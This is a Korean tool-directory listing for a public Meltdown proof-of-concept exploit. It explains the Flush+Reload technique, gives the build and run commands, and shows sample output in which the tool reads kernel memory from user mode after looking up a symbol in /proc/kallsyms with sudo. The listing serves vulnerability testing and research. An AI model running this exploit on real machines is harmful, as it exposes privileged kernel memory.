Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/paboldin/meltdown-exploit
Memory ForensicsVulnerability AnalysisExploitationBinary Exploitation
GitHubpaboldin/meltdown-exploit

meltdown-exploit

Meltdown Exploit PoC

저장소 보기
94926358년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

MELTDOWN 익스플로잇 POC

추측 기반 최적화는 코드를 안전하지 않은 방식으로 실행하여 캐시와 같은 마이크로아키텍처에 데이터 추적을 남깁니다.

Lipp et. al 2018은 2018-01-09에 코드를 https://github.com/IAIK/meltdown에 게시했습니다. 자세한 내용은 논문을 참조하세요: https://meltdownattack.com/meltdown.pdf.

현재는 linux_proc_banner만 덤프할 수 있습니다. 액세스된 메모리가 캐시에 있어야 하기 때문이며 linux_proc_banner는 /proc/version을 읽을 때마다 캐시됩니다. prefetch와 함께 작동할 수 있습니다. sched_yield와 함께 작동합니다.

make로 빌드하고 ./run.sh로 실행합니다.

아직 KASLR을 우회할 수 없으므로 /proc/kallsyms에서 linux_proc_banner를 찾기 위해 비밀번호를 입력해야 할 수도 있습니다 (또는 수동으로 수행).

Flush+Reload 및 타겟 배열 접근 방식은 spectre 논문 https://spectreattack.com/spectre.pdf 에서 가져왔으며, https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ 의 단서를 따라 구현되었습니다.

판도라의 상자가 열렸습니다.

제 머신에서 IAIK 버전과 함께 작동하는 전체 익스플로잇을 확인하세요.

결과:

root@kitploit:~
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

작동 환경

취약한 CPU/커널 목록은 여기로 이동되었습니다: https://github.com/paboldin/meltdown-exploit/issues/19

취약하지 않은 CPU/커널 목록은 여기로 이동되었습니다: https://github.com/paboldin/meltdown-exploit/issues/22

도구 다운로드